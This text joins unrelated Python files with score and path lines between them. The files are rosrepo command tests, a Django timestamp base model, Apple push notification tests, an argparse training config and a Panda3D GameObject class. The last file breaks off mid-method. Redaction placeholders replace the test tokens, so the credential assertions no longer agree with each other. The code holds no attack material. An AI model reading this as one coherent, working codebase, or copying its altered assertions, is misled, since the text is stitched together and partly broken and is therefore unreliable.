    def test_build(self):
        """Test proper behavior of 'rosrepo build'"""
        exitcode, stdout = helper.run_rosrepo("init", "-r", self.ros_root_dir, self.wsdir)
        self.assertEqual(exitcode, 0)
        exitcode, stdout = helper.run_rosrepo("config", "-w", self.wsdir, "--job-limit", "1")
        self.assertEqual(exitcode, 0)
        # Building with an empty build set is an error.
        exitcode, stdout = helper.run_rosrepo("build", "-w", self.wsdir, "--dry-run")
        self.assertEqual(exitcode, 1)
        self.assertIn("no packages to build", stdout)
        # A failing catkin_lint must abort a real build (but not a dry run).
        helper.failing_programs = ["catkin_lint"]
        exitcode, stdout = helper.run_rosrepo("build", "-w", self.wsdir, "--dry-run", "alpha")
        self.assertEqual(exitcode, 0)
        self.assertIn("alpha", stdout)
        self.assertIn("beta", stdout)
        self.assertIn("gamma", stdout)
        self.assertIn("delta", stdout)
        exitcode, stdout = helper.run_rosrepo("build", "-w", self.wsdir, "alpha")
        self.assertEqual(exitcode, 1)
        self.assertIn("catkin_lint reported errors", stdout)
        helper.failing_programs = []
        with patch("rosrepo.cmd_build.find_ros_root", lambda x: None):
            exitcode, stdout = helper.run_rosrepo("build", "-w", self.wsdir, "alpha")
            self.assertEqual(exitcode, 1)
            self.assertIn("cannot detect ROS distribution", stdout)
        exitcode, stdout = helper.run_rosrepo("build", "-w", self.wsdir, "--all")
        self.assertEqual(exitcode, 1)
        self.assertIn("cannot resolve dependencies", stdout)
        # --set-default / --set-pinned require an explicit package list.
        exitcode, stdout = helper.run_rosrepo("build", "-w", self.wsdir, "--set-default")
        self.assertEqual(exitcode, 1)
        self.assertIn("no packages given", stdout)
        exitcode, stdout = helper.run_rosrepo("build", "-w", self.wsdir, "--set-default", "alpha")
        self.assertEqual(exitcode, 0)
        self.assertEqual(self.get_config_value("default_build", []), ["alpha"])
        exitcode, stdout = helper.run_rosrepo("build", "-w", self.wsdir, "--set-pinned")
        self.assertEqual(exitcode, 1)
        self.assertIn("no packages given", stdout)
        exitcode, stdout = helper.run_rosrepo("build", "-w", self.wsdir, "--set-pinned", "beta")
        self.assertEqual(exitcode, 0)
        self.assertEqual(self.get_config_value("pinned_build", []), ["beta"])
        exitcode, stdout = helper.run_rosrepo("build", "-w", self.wsdir)
        self.assertEqual(exitcode, 0)
        self.assertIn("alpha", stdout)
        self.assertIn("beta", stdout)
        self.assertIn("gamma", stdout)
        self.assertIn("delta", stdout)
        # With the default set cleared, only the pinned set (beta + delta) builds.
        exitcode, stdout = helper.run_rosrepo("exclude", "-w", self.wsdir, "--all")
        self.assertEqual(exitcode, 0)
        exitcode, stdout = helper.run_rosrepo("build", "-w", self.wsdir)
        self.assertEqual(exitcode, 0)
        self.assertNotIn("alpha", stdout)
        self.assertNotIn("gamma", stdout)
        self.assertIn("beta", stdout)
        self.assertIn("delta", stdout)
        exitcode, stdout = helper.run_rosrepo("build", "-w", self.wsdir, "incomplete")
        self.assertEqual(exitcode, 1)
        self.assertIn("missing system package", stdout)
        exitcode, stdout = helper.run_rosrepo("build", "-w", self.wsdir, "--clean")
        self.assertEqual(exitcode, 0)
        # Smoke test for the remaining command line options.
        exitcode, stdout = helper.run_rosrepo("build", "-w", self.wsdir, "--clean", "--dry-run", "--offline", "--verbose", "--no-status", "--keep-going", "-j2")
        self.assertEqual(exitcode, 0)
    def test_list(self):
        """Test proper behavior of 'rosrepo list'"""
        exitcode, stdout = helper.run_rosrepo("init", "-r", self.ros_root_dir, self.wsdir)
        self.assertEqual(exitcode, 0)
        exitcode, stdout = helper.run_rosrepo("include", "-w", self.wsdir, "alpha")
        self.assertEqual(exitcode, 0)
        exitcode, stdout = helper.run_rosrepo("include", "-w", self.wsdir, "--pinned", "beta")
        self.assertEqual(exitcode, 0)
        exitcode, stdout = helper.run_rosrepo("list", "-w", self.wsdir)
        self.assertEqual(exitcode, 0)
        self.assertIn("alpha", stdout)
        self.assertIn("beta", stdout)
        self.assertIn("gamma", stdout)
        self.assertIn("delta", stdout)
        self.assertNotIn("epsilon", stdout)
        # -B and -C together produce a note about the search filter.
        exitcode, stdout = helper.run_rosrepo("list", "-w", self.wsdir, "-BC")
        self.assertEqual(exitcode, 0)
        self.assertIn("search filter", stdout)
        # -S: the default (explicitly included) set -- alpha, but not pinned beta.
        exitcode, stdout = helper.run_rosrepo("list", "-w", self.wsdir, "-S")
        self.assertEqual(exitcode, 0)
        self.assertIn("alpha", stdout)
        self.assertNotIn("beta", stdout)
        # -P: pinned only; -v inverts the filter; -D adds dependencies.
        exitcode, stdout = helper.run_rosrepo("list", "-w", self.wsdir, "-P")
        self.assertEqual(exitcode, 0)
        self.assertNotIn("alpha", stdout)
        self.assertIn("beta", stdout)
        self.assertNotIn("delta", stdout)
        exitcode, stdout = helper.run_rosrepo("list", "-w", self.wsdir, "-Pv")
        self.assertEqual(exitcode, 0)
        self.assertIn("alpha", stdout)
        self.assertNotIn("beta", stdout)
        self.assertIn("delta", stdout)
        exitcode, stdout = helper.run_rosrepo("list", "-w", self.wsdir, "-PD")
        self.assertEqual(exitcode, 0)
        self.assertNotIn("alpha", stdout)
        self.assertIn("beta", stdout)
        self.assertIn("delta", stdout)
        # -W lists the whole workspace, including unbuilt packages.
        exitcode, stdout = helper.run_rosrepo("list", "-w", self.wsdir, "-W")
        self.assertIn("alpha", stdout)
        self.assertIn("beta", stdout)
        self.assertIn("epsilon", stdout)
    def test_config(self):
        """Test proper behavior of 'rosrepo config'"""
        exitcode, stdout = helper.run_rosrepo("init", "-r", self.ros_root_dir, self.wsdir)
        self.assertEqual(exitcode, 0)
        with patch("rosrepo.cmd_config.find_ros_root", lambda x: None):
            exitcode, stdout = helper.run_rosrepo("config", "-w", self.wsdir)
            self.assertEqual(exitcode, 1)
            self.assertIn("cannot detect ROS distribution", stdout)
        ####################### job limit (0 and --no-job-limit clear it)
        exitcode, stdout = helper.run_rosrepo("config", "-w", self.wsdir, "--job-limit", "16")
        self.assertEqual(exitcode, 0)
        self.assertEqual(self.get_config_value("job_limit"), 16)
        exitcode, stdout = helper.run_rosrepo("config", "-w", self.wsdir, "--job-limit", "0")
        self.assertEqual(exitcode, 0)
        self.assertEqual(self.get_config_value("job_limit"), None)
        exitcode, stdout = helper.run_rosrepo("config", "-w", self.wsdir, "--job-limit", "8")
        self.assertEqual(exitcode, 0)
        self.assertEqual(self.get_config_value("job_limit"), 8)
        exitcode, stdout = helper.run_rosrepo("config", "-w", self.wsdir, "--no-job-limit")
        self.assertEqual(exitcode, 0)
        self.assertEqual(self.get_config_value("job_limit"), None)
        ####################### install flag
        exitcode, stdout = helper.run_rosrepo("config", "-w", self.wsdir, "--install")
        self.assertEqual(exitcode, 0)
        self.assertEqual(self.get_config_value("install"), True)
        exitcode, stdout = helper.run_rosrepo("config", "-w", self.wsdir, "--no-install")
        self.assertEqual(exitcode, 0)
        self.assertEqual(self.get_config_value("install"), False)
        ####################### compiler selection (unknown compilers are rejected)
        exitcode, stdout = helper.run_rosrepo("config", "-w", self.wsdir, "--set-compiler", "clang")
        self.assertEqual(exitcode, 0)
        self.assertEqual(self.get_config_value("compiler"), "clang")
        exitcode, stdout = helper.run_rosrepo("config", "-w", self.wsdir, "--set-compiler", "does_not_exist")
        self.assertEqual(exitcode, 1)
        self.assertIn("unknown compiler", stdout)
        self.assertEqual(self.get_config_value("compiler"), "clang")
        exitcode, stdout = helper.run_rosrepo("config", "-w", self.wsdir, "--unset-compiler")
        self.assertEqual(exitcode, 0)
        self.assertEqual(self.get_config_value("compiler"), None)
        ####################### gitlab crawl depth
        exitcode, stdout = helper.run_rosrepo("config", "-w", self.wsdir, "--set-gitlab-crawl-depth", "2")
        self.assertEqual(exitcode, 0)
        self.assertEqual(self.get_config_value("gitlab_crawl_depth"), 2)
        exitcode, stdout = helper.run_rosrepo("config", "-w", self.wsdir, "--set-gitlab-crawl-depth", "1")
        self.assertEqual(exitcode, 0)
        self.assertEqual(self.get_config_value("gitlab_crawl_depth"), 1)
        ####################### gitlab servers, tokens, and credential storage
        exitcode, stdout = helper.run_rosrepo("config", "-w", self.wsdir, "--set-gitlab-url", "Test", "http://localhost", "--store-credentials")
        self.assertEqual(exitcode, 0)
        self.assertEqual(self.get_config_value("gitlab_servers"), [{"label": "Test", "url": "http://localhost", "private_token": "<PASSWORD>token"}])
        exitcode, stdout = helper.run_rosrepo("config", "-w", self.wsdir, "--set-gitlab-url", "Test", "http://localhost", "--private-token", "<PASSWORD>", "--store-credentials")
        self.assertEqual(exitcode, 0)
        self.assertEqual(self.get_config_value("store_credentials"), True)
        exitcode, stdout = helper.run_rosrepo("config", "-w", self.wsdir, "--no-store-credentials")
        self.assertEqual(exitcode, 0)
        self.assertEqual(self.get_config_value("store_credentials"), False)
        self.assertEqual(self.get_config_value("gitlab_servers"), [{"label": "Test", "url": "http://localhost", "private_token": "<PASSWORD>"}])
        exitcode, stdout = helper.run_rosrepo("config", "-w", self.wsdir, "--set-gitlab-url", "Test", "http://localhost", "--private-token", "<PASSWORD>")
        self.assertEqual(exitcode, 0)
        exitcode, stdout = helper.run_rosrepo("config", "-w", self.wsdir, "--set-gitlab-url", "Test", "http://localhost")
        self.assertEqual(exitcode, 0)
        self.assertEqual(self.get_config_value("gitlab_servers"), [{"label": "Test", "url": "http://localhost", "private_token": "<PASSWORD>"}])
        self.assertEqual(
            helper.run_rosrepo("config", "-w", self.wsdir, "--get-gitlab-url", "does_not_exist"),
            (0, "\n")
        )
        self.assertEqual(
            helper.run_rosrepo("config", "-w", self.wsdir, "--get-gitlab-url", "Test"),
            (0, "http://localhost\n")
        )
        self.assertEqual(
            helper.run_rosrepo("config", "-w", self.wsdir, "--show-gitlab-urls", "--autocomplete"),
            (0, "Test\n")
        )
        exitcode, stdout = helper.run_rosrepo("config", "-w", self.wsdir, "--show-gitlab-urls")
        self.assertEqual(exitcode, 0)
        self.assertIn("Test", stdout)
        self.assertIn("http://localhost", stdout)
        self.assertIn("yes", stdout)
        exitcode, stdout = helper.run_rosrepo("config", "-w", self.wsdir, "--gitlab-logout", "does_not_exist")
        self.assertEqual(exitcode, 1)
        self.assertIn("no such Gitlab server", stdout)
        # Logout drops the stored token but keeps the server entry.
        exitcode, stdout = helper.run_rosrepo("config", "-w", self.wsdir, "--gitlab-logout", "Test")
        self.assertEqual(exitcode, 0)
        self.assertEqual(self.get_config_value("gitlab_servers"), [{"label": "Test", "url": "http://localhost"}])
        exitcode, stdout = helper.run_rosrepo("config", "-w", self.wsdir, "--set-gitlab-url", "Test", "http://localhost", "--private-token", "<PASSWORD>")
        self.assertEqual(exitcode, 0)
        self.assertEqual(self.get_config_value("gitlab_servers"), [{"label": "Test", "url": "http://localhost"}])
        exitcode, stdout = helper.run_rosrepo("config", "-w", self.wsdir, "--set-gitlab-url", "Test", "http://localhost")
        self.assertEqual(exitcode, 0)
        self.assertEqual(self.get_config_value("gitlab_servers"), [{"label": "Test", "url": "http://localhost"}])
        exitcode, stdout = helper.run_rosrepo("config", "-w", self.wsdir, "--unset-gitlab-url", "Test")
        self.assertEqual(exitcode, 0)
        self.assertEqual(
            helper.run_rosrepo("config", "-w", self.wsdir, "--show-gitlab-urls", "--autocomplete"),
            (0, "\n")
        )
        exitcode, stdout = helper.run_rosrepo("config", "-w", self.wsdir, "--set-gitlab-url", "Test", "http://localhost", "--private-token", "<PASSWORD>")
        self.assertEqual(exitcode, 0)
        exitcode, stdout = helper.run_rosrepo("config", "-w", self.wsdir, "--gitlab-login", "Test", "--private-token", "<PASSWORD>")
        self.assertEqual(exitcode, 0)
        self.assertEqual(self.get_config_value("gitlab_servers"), [{"label": "Test", "url": "http://localhost"}])
        exitcode, stdout = helper.run_rosrepo("config", "-w", self.wsdir, "--set-gitlab-url", "Test", "http://localhost", "--private-token", "<PASSWORD>", "--store-credentials")
        self.assertEqual(exitcode, 0)
        self.assertEqual(self.get_config_value("gitlab_servers"), [{"label": "Test", "url": "http://localhost", "private_token": "t0ps3cr3t"}])
        exitcode, stdout = helper.run_rosrepo("config", "-w", self.wsdir, "--remove-credentials")
        self.assertEqual(exitcode, 0)
        self.assertEqual(self.get_config_value("gitlab_servers"), [{"label": "Test", "url": "http://localhost"}])
        exitcode, stdout = helper.run_rosrepo("config", "-w", self.wsdir, "--gitlab-login", "Test", "--private-token", "<PASSWORD>")
        self.assertEqual(exitcode, 0)
        self.assertEqual(self.get_config_value("gitlab_servers"), [{"label": "Test", "url": "http://localhost", "private_token": "<PASSWORD>"}])
        exitcode, stdout = helper.run_rosrepo("config", "-w", self.wsdir, "--gitlab-login", "Test")
        self.assertEqual(exitcode, 0)
        self.assertEqual(self.get_config_value("gitlab_servers"), [{"label": "Test", "url": "http://localhost", "private_token": "<PASSWORD>"}])
        # Offline mode: an existing token cannot be verified (warning only)...
        exitcode, stdout = helper.run_rosrepo("config", "-w", self.wsdir, "--offline", "--set-gitlab-url", "Test", "http://localhost")
        self.assertEqual(exitcode, 0)
        self.assertIn("cannot verify Gitlab private token in offline mode", stdout)
        exitcode, stdout = helper.run_rosrepo("config", "-w", self.wsdir, "--offline", "--gitlab-login", "Test")
        self.assertEqual(exitcode, 0)
        self.assertIn("cannot verify Gitlab private token in offline mode", stdout)
        exitcode, stdout = helper.run_rosrepo("config", "-w", self.wsdir, "--remove-credentials")
        self.assertEqual(exitcode, 0)
        # ...and a missing token cannot be acquired at all (hard error).
        exitcode, stdout = helper.run_rosrepo("config", "-w", self.wsdir, "--offline", "--set-gitlab-url", "Test", "http://localhost")
        self.assertEqual(exitcode, 1)
        self.assertIn("cannot acquire Gitlab private token in offline mode", stdout)
        exitcode, stdout = helper.run_rosrepo("config", "-w", self.wsdir, "--offline", "--gitlab-login", "Test")
        self.assertEqual(exitcode, 1)
        self.assertIn("cannot acquire Gitlab private token in offline mode", stdout)
        exitcode, stdout = helper.run_rosrepo("config", "-w", self.wsdir, "--unset-gitlab-url", "Test")
        self.assertEqual(exitcode, 0)
        cfg = Config(self.wsdir)
        cfg["gitlab_servers"] = [{"label": "NoURL"}]
        cfg.write()
        exitcode, stdout = helper.run_rosrepo("config", "-w", self.wsdir, "--gitlab-login", "NoURL")
        self.assertEqual(exitcode, 1)
        self.assertIn("cannot acquire token for Gitlab server without URL", stdout)
        exitcode, stdout = helper.run_rosrepo("config", "-w", self.wsdir, "--gitlab-login", "does_not_exist")
        self.assertEqual(exitcode, 1)
        self.assertIn("no such Gitlab server", stdout)
        ####################### ros root override
        self.assertEqual(self.get_config_value("ros_root"), self.ros_root_dir)
        helper.run_rosrepo("config", "-w", self.wsdir, "--unset-ros-root")
        self.assertEqual(self.get_config_value("ros_root"), None)
        exitcode, stdout = helper.run_rosrepo("config", "-w", self.wsdir, "--set-ros-root", self.ros_root_dir)
        self.assertEqual(exitcode, 0)
        self.assertEqual(self.get_config_value("ros_root"), self.ros_root_dir)
        ####################### catkin_lint toggle
        exitcode, stdout = helper.run_rosrepo("config", "-w", self.wsdir, "--no-catkin-lint")
        self.assertEqual(exitcode, 0)
        self.assertEqual(self.get_config_value("use_catkin_lint"), False)
        exitcode, stdout = helper.run_rosrepo("config", "-w", self.wsdir, "--catkin-lint")
        self.assertEqual(exitcode, 0)
        self.assertEqual(self.get_config_value("use_catkin_lint"), True)
        exitcode, stdout = helper.run_rosrepo("config", "-w", self.wsdir, "--no-catkin-lint")
        self.assertEqual(exitcode, 0)
        self.assertEqual(self.get_config_value("use_catkin_lint"), False)
        ####################### rosclipse toggle
        exitcode, stdout = helper.run_rosrepo("config", "-w", self.wsdir, "--no-rosclipse")
        self.assertEqual(exitcode, 0)
        self.assertEqual(self.get_config_value("use_rosclipse"), False)
        exitcode, stdout = helper.run_rosrepo("config", "-w", self.wsdir, "--rosclipse")
        self.assertEqual(exitcode, 0)
        self.assertEqual(self.get_config_value("use_rosclipse"), True)
        exitcode, stdout = helper.run_rosrepo("config", "-w", self.wsdir, "--no-rosclipse")
        self.assertEqual(exitcode, 0)
        self.assertEqual(self.get_config_value("use_rosclipse"), False)
        ####################### environment cache toggle
        exitcode, stdout = helper.run_rosrepo("config", "-w", self.wsdir, "--no-env-cache")
        self.assertEqual(exitcode, 0)
        self.assertEqual(self.get_config_value("use_env_cache"), False)
        exitcode, stdout = helper.run_rosrepo("config", "-w", self.wsdir, "--env-cache")
        self.assertEqual(exitcode, 0)
        self.assertEqual(self.get_config_value("use_env_cache"), True)
        exitcode, stdout = helper.run_rosrepo("config", "-w", self.wsdir, "--no-env-cache")
        self.assertEqual(exitcode, 0)
        self.assertEqual(self.get_config_value("use_env_cache"), False)
        #######################
    def test_init_failures(self):
        """Test proper behavior of 'rosrepo init'"""
        # Without a detectable ROS root, init must fail with a clear message.
        with patch("rosrepo.cmd_init.find_ros_root", lambda x: None):
            exitcode, stdout = helper.run_rosrepo("init", self.wsdir)
            self.assertEqual(exitcode, 1)
            self.assertIn("cannot detect ROS distribution", stdout)
        # A workspace that coincides with $HOME must be rejected.
        os.environ["HOME"] = self.wsdir
        exitcode, stdout = helper.run_rosrepo("init", "-r", self.ros_root_dir, self.wsdir)
        self.assertEqual(exitcode, 1)
        self.assertIn("$HOME", stdout)
        # The rosrepo source tree itself is not a valid workspace either.
        exitcode, stdout = helper.run_rosrepo("init", "-r", self.ros_root_dir, os.path.normpath(os.path.join(os.path.dirname(__file__), os.pardir)))
        self.assertEqual(exitcode, 1)
        self.assertIn("rosrepo source folder", stdout)
| 1.453125 | 1 |
suministrospr/utils/models.py | amberlowh/suministrospr | 42 | 12797848 | from django.db import models
from .fields import DateTimeCreatedField, DateTimeModifiedField
class BaseModel(models.Model):
    """Abstract base model that adds creation/modification timestamps.

    NOTE(review): the timestamps are presumably auto-populated by the custom
    field classes imported from ``.fields`` -- confirm their save behavior
    there.
    """

    # Set when the row is first created.
    created_at = DateTimeCreatedField()
    # Refreshed on every modification.
    modified_at = DateTimeModifiedField()

    class Meta:
        get_latest_by = "modified_at"
        ordering = ("-modified_at", "-created_at")
        # Abstract: no table is created for this model itself.
        abstract = True
| 1.429688 | 1 |
applepushnotification/tests/test_basic.py | xiaohaifxb/applepushnotification | 7 | 12797856 | #!/usr/bin/env python
from applepushnotification import *
from unittest import TestCase
from applepushnotification.tests import TestAPNS
import struct, time
# Prefer the stdlib ``json`` module; fall back to ``simplejson`` on very old
# interpreters that lack it.  (The original used the Python-2-only
# ``except ImportError, e`` syntax and bound an unused name; this form works
# on both Python 2 and 3.)
try:
    import json
except ImportError:
    import simplejson as json
class TestBasic(TestAPNS):
    """Basic sanity tests for APNS service construction and message encoding."""

    def test_construct_service(self):
        """The service starts and stops cleanly, releasing its worker greenlets."""
        service = self.create_service()
        service.start()
        service.stop()
        self.assertIsNone(service._send_greenlet)
        self.assertIsNone(service._error_greenlet)

    def test_construct_message(self):
        """An encoded message carries the enhanced-format binary header."""
        msg = self.create_message()
        encoded = str(msg)
        # Enhanced notification header: command (1 byte), identifier (4),
        # expiry (4), token length (2) -- 11 bytes in total.
        command, identifier, expiry, tok_length = struct.unpack("!bIIH",
            encoded[0:11])
        self.assertEqual(command, 1)
        self.assertEqual(identifier, msg.identifier)
        self.assertTrue(expiry > time.time())
        self.assertEqual(tok_length, 32)
        # Payload begins after the 11-byte header, the 32-byte device token
        # and the 2-byte payload-length field (11 + 32 + 2 = 45).
        data = encoded[45:]
        m = json.loads(data)
        self.assertTrue("aps" in m)

    def test_send_message(self):
        """A message can be queued and the service still stops cleanly."""
        service = self.create_service()
        service.start()
        service.send(self.create_message())
        self.assertTrue(service.stop())
| 1.484375 | 1 |
config.py | Pandinosaurus/pnn.pytorch | 1 | 12797864 | # config.py
"""Command-line configuration for the project.

Arguments are parsed once at import time; other modules use
``from config import args``.
"""

import os
import datetime
import argparse

# Each run gets its own timestamped results directory.
result_path = "results/"
result_path = os.path.join(result_path, datetime.datetime.now().strftime('%Y-%m-%d_%H-%M-%S/'))


def _str2bool(value):
    """Parse a command-line boolean value.

    ``argparse``'s ``type=bool`` is a well-known pitfall: any non-empty
    string -- including ``"False"`` -- is truthy, so ``--cuda False`` would
    silently enable CUDA.  This helper accepts the usual spellings instead.
    """
    if isinstance(value, bool):
        return value
    return value.strip().lower() in ('1', 'true', 'yes', 'y', 'on')


parser = argparse.ArgumentParser(description='Your project title goes here')

# ======================== Data Setings ============================================
parser.add_argument('--dataset-test', type=str, default='CIFAR10', metavar='', help='name of training dataset')
parser.add_argument('--dataset-train', type=str, default='CIFAR10', metavar='', help='name of training dataset')
parser.add_argument('--split_test', type=float, default=None, metavar='', help='percentage of test dataset to split')
parser.add_argument('--split_train', type=float, default=None, metavar='', help='percentage of train dataset to split')
parser.add_argument('--dataroot', type=str, default='../../data', metavar='', help='path to the data')
parser.add_argument('--save', type=str, default=result_path +'Save', metavar='', help='save the trained models here')
parser.add_argument('--logs', type=str, default=result_path +'Logs', metavar='', help='save the training log files here')
parser.add_argument('--resume', type=str, default=None, metavar='', help='full path of models to resume training')
parser.add_argument('--nclasses', type=int, default=10, metavar='', help='number of classes for classification')
parser.add_argument('--input-filename-test', type=str, default=None, metavar='', help='input test filename for filelist and folderlist')
parser.add_argument('--label-filename-test', type=str, default=None, metavar='', help='label test filename for filelist and folderlist')
parser.add_argument('--input-filename-train', type=str, default=None, metavar='', help='input train filename for filelist and folderlist')
parser.add_argument('--label-filename-train', type=str, default=None, metavar='', help='label train filename for filelist and folderlist')
parser.add_argument('--loader-input', type=str, default=None, metavar='', help='input loader')
parser.add_argument('--loader-label', type=str, default=None, metavar='', help='label loader')

# ======================== Network Model Setings ===================================
parser.add_argument('--nblocks', type=int, default=10, metavar='', help='number of blocks in each layer')
parser.add_argument('--nlayers', type=int, default=6, metavar='', help='number of layers')
parser.add_argument('--nchannels', type=int, default=3, metavar='', help='number of input channels')
parser.add_argument('--nfilters', type=int, default=64, metavar='', help='number of filters in each layer')
parser.add_argument('--avgpool', type=int, default=1, metavar='', help='set to 7 for imagenet and 1 for cifar10')
parser.add_argument('--level', type=float, default=0.1, metavar='', help='noise level for uniform noise')
parser.add_argument('--resolution-high', type=int, default=32, metavar='', help='image resolution height')
parser.add_argument('--resolution-wide', type=int, default=32, metavar='', help='image resolution width')
parser.add_argument('--ndim', type=int, default=None, metavar='', help='number of feature dimensions')
parser.add_argument('--nunits', type=int, default=None, metavar='', help='number of units in hidden layers')
parser.add_argument('--dropout', type=float, default=None, metavar='', help='dropout parameter')
parser.add_argument('--net-type', type=str, default='noiseresnet18', metavar='', help='type of network')
parser.add_argument('--length-scale', type=float, default=None, metavar='', help='length scale')
parser.add_argument('--tau', type=float, default=None, metavar='', help='Tau')

# ======================== Training Settings =======================================
# NOTE: was ``type=bool`` (always True for any non-empty string); fixed.
parser.add_argument('--cuda', type=_str2bool, default=True, metavar='', help='run on gpu')
parser.add_argument('--ngpu', type=int, default=1, metavar='', help='number of gpus to use')
parser.add_argument('--batch-size', type=int, default=64, metavar='', help='batch size for training')
parser.add_argument('--nepochs', type=int, default=500, metavar='', help='number of epochs to train')
parser.add_argument('--niters', type=int, default=None, metavar='', help='number of iterations at test time')
parser.add_argument('--epoch-number', type=int, default=None, metavar='', help='epoch number')
parser.add_argument('--nthreads', type=int, default=20, metavar='', help='number of threads for data loading')
parser.add_argument('--manual-seed', type=int, default=1, metavar='', help='manual seed for randomness')
parser.add_argument('--port', type=int, default=8097, metavar='', help='port for visualizing training at http://localhost:port')

# ======================== Hyperparameter Setings ==================================
parser.add_argument('--optim-method', type=str, default='Adam', metavar='', help='the optimization routine ')
parser.add_argument('--learning-rate', type=float, default=1e-3, metavar='', help='learning rate')
parser.add_argument('--learning-rate-decay', type=float, default=None, metavar='', help='learning rate decay')
parser.add_argument('--momentum', type=float, default=0.9, metavar='', help='momentum')
parser.add_argument('--weight-decay', type=float, default=1e-4, metavar='', help='weight decay')
parser.add_argument('--adam-beta1', type=float, default=0.9, metavar='', help='Beta 1 parameter for Adam')
parser.add_argument('--adam-beta2', type=float, default=0.999, metavar='', help='Beta 2 parameter for Adam')

args = parser.parse_args()
GameObject.py | P3D-Space-Tech-Demo/Section2SpaceflightDocking | 0 | 12797872 | <gh_stars>0
from panda3d.core import Vec4, Vec3, Vec2, Plane, Point3, BitMask32
from direct.actor.Actor import Actor
from panda3d.core import CollisionSphere, CollisionCapsule, CollisionNode, CollisionRay, CollisionSegment, CollisionHandlerQueue
from direct.gui.OnscreenText import OnscreenText
from direct.gui.OnscreenImage import OnscreenImage
from panda3d.core import TextNode
from panda3d.core import AudioSound
from panda3d.core import PointLight
from panda3d.core import NodePath, PandaNode
from panda3d.core import Quat
from Section2SpaceflightDocking.CommonValues import *
from Section2SpaceflightDocking.Common import Common
import math, random
# Deceleration factor applied per second to objects that are not walking.
FRICTION = 10.0
class GameObject():
    """Base class for world objects: a scene-graph root, an actor/model,
    health with recharge, simple velocity physics and an optional sphere
    collider tagged back to its owner."""

    def __init__(self, pos, modelName, modelAnims, maxHealth, maxSpeed, colliderName, weaponIntoMask, size):
        """Build the node hierarchy, load the model/actor and (optionally)
        attach a sphere collider of radius ``size``.

        If ``modelName`` is None an empty placeholder node is used; if
        ``modelAnims`` is None the model is loaded statically, otherwise an
        animated ``Actor`` is created.
        """
        self.root = Common.framework.showBase.render.attachNewNode(PandaNode("obj"))

        self.colliderName = colliderName
        self.modelName = modelName

        if modelName is None:
            self.actor = NodePath(PandaNode("actor"))
        elif modelAnims is None:
            self.actor = Common.framework.showBase.loader.loadModel(modelName)
        else:
            self.actor = Actor(modelName, modelAnims)
        self.actor.reparentTo(self.root)

        if pos is not None:
            self.root.setPos(pos)

        # Health recharges over time unless recently damaged.
        self.maxHealth = maxHealth
        self.health = maxHealth
        self.healthRechargeRate = 2.0
        self.healthRechargeSuppressionTimer = 0
        self.healthRechargeSuppressionDuration = 0.5

        self.maxSpeed = maxSpeed
        # Hard cap on speed while knocked out of control.
        self.terminalVelocity = 50

        self.flinchCounter = 0

        self.velocity = Vec3(0, 0, 0)
        self.acceleration = 300.0

        # While ``inControl`` is False the object is being knocked around
        # and ignores its normal max-speed clamp.
        self.inControl = True
        self.outOfControlTimer = 0

        self.walking = False

        self.size = size

        if colliderName is not None:
            colliderNode = CollisionNode(colliderName)
            colliderNode.addSolid(CollisionSphere(0, 0, 0, size))
            self.colliderNP = self.root.attachNewNode(colliderNode)
            # Tag the collider so collision handlers can find this object.
            self.colliderNP.setPythonTag(TAG_OWNER, self)
            colliderNode.setFromCollideMask(0)
            colliderNode.setIntoCollideMask(weaponIntoMask)
            #self.colliderNP.show()
        else:
            self.colliderNP = self.root.attachNewNode(PandaNode("stand-in"))

        self.deathSound = None

    def physicalImpact(self, surfaceNormal):
        """Reflect the velocity about ``surfaceNormal`` (a simple bounce)."""
        proj = self.velocity.project(surfaceNormal)
        self.velocity -= proj*2

    def update(self, dt, fluid = False):
        """Per-frame integration: clamp speed, apply friction, recover from
        knock-back, move the root node and recharge health.

        ``fluid`` selects Panda3D's fluid (collision-aware) position update.
        """
        speed = self.velocity.length()
        if self.inControl:
            # Normal movement: clamp to walking speed.
            if self.walking and speed > self.maxSpeed:
                self.velocity.normalize()
                self.velocity *= self.maxSpeed
                speed = self.maxSpeed
        else:
            # Knocked back: only the terminal velocity applies.
            if speed > self.terminalVelocity:
                self.velocity.normalize()
                self.velocity *= self.terminalVelocity
                speed = self.terminalVelocity

        if Common.useFriction:
            if not self.walking:
                # Friction weakens above max speed (perc > 1) and while
                # out of control.
                perc = speed/self.maxSpeed
                frictionVal = FRICTION*dt/(max(1, perc*perc))
                if not self.inControl:
                    frictionVal *= 0.8
                if frictionVal > speed:
                    self.velocity.set(0, 0, 0)
                else:
                    frictionVec = -self.velocity
                    frictionVec.normalize()
                    frictionVec *= frictionVal
                    self.velocity += frictionVec

        # Regain control once nearly stopped, or when the timer runs out.
        if not self.inControl:
            if speed < 0.1:
                self.inControl = True
            else:
                self.outOfControlTimer -= dt
                if self.outOfControlTimer <= 0:
                    self.inControl = True

        if fluid:
            self.root.setFluidPos(self.root.getPos() + self.velocity*dt)
        else:
            self.root.setPos(self.root.getPos() + self.velocity*dt)

        # Health recharge is suppressed briefly after taking damage.
        if self.healthRechargeSuppressionTimer > 0:
            self.healthRechargeSuppressionTimer -= dt
        else:
            self.alterHealth(self.healthRechargeRate*dt, None, 0, 0)

    def alterHealth(self, dHealth, incomingImpulse, knockback, flinchValue, overcharge = False):
        """Apply a health change, optional knock-back impulse and flinch.

        Negative ``dHealth`` is damage (suppresses recharge); positive is
        healing, clamped at ``maxHealth`` unless ``overcharge`` is set.
        Plays the death sound on the transition to zero health.
        """
        previousHealth = self.health

        self.health += dHealth

        if incomingImpulse is not None and knockback > 0.1:
            self.velocity += incomingImpulse*knockback

            self.inControl = False
            self.outOfControlTimer = knockback*0.1
            self.walking = False

        if dHealth < 0:
            self.healthRechargeSuppressionTimer = self.healthRechargeSuppressionDuration

        if self.health < 0:
            self.health = 0

        if flinchValue > 0:
            self.flinchCounter -= flinchValue

        if dHealth > 0 and self.health > self.maxHealth and not overcharge:
            self.health = self.maxHealth

        if previousHealth > 0 and self.health <= 0 and self.deathSound is not None:
            self.deathSound.play()

    def turnTowards(self, target, turnRate, dt):
        """Rotate the root towards ``target`` (point, NodePath or GameObject),
        limited to ``turnRate`` degrees per second."""
        if isinstance(target, NodePath):
            target = target.getPos(Common.framework.showBase.render)
        elif isinstance(target, GameObject):
            target = target.root.getPos(Common.framework.showBase.render)
        diff = target - self.root.getPos(Common.framework.showBase.render)

        selfQuat = self.root.getQuat(Common.framework.showBase.render)
        selfForward = selfQuat.getForward()

        # Rotation axis perpendicular to the current and desired headings.
        axis = selfForward.cross(diff.normalized())
        axis.normalize()
        if axis.lengthSquared() < 0.1:
            return

        angle = selfForward.signedAngleDeg(diff.normalized(), axis)

        quat = Quat()
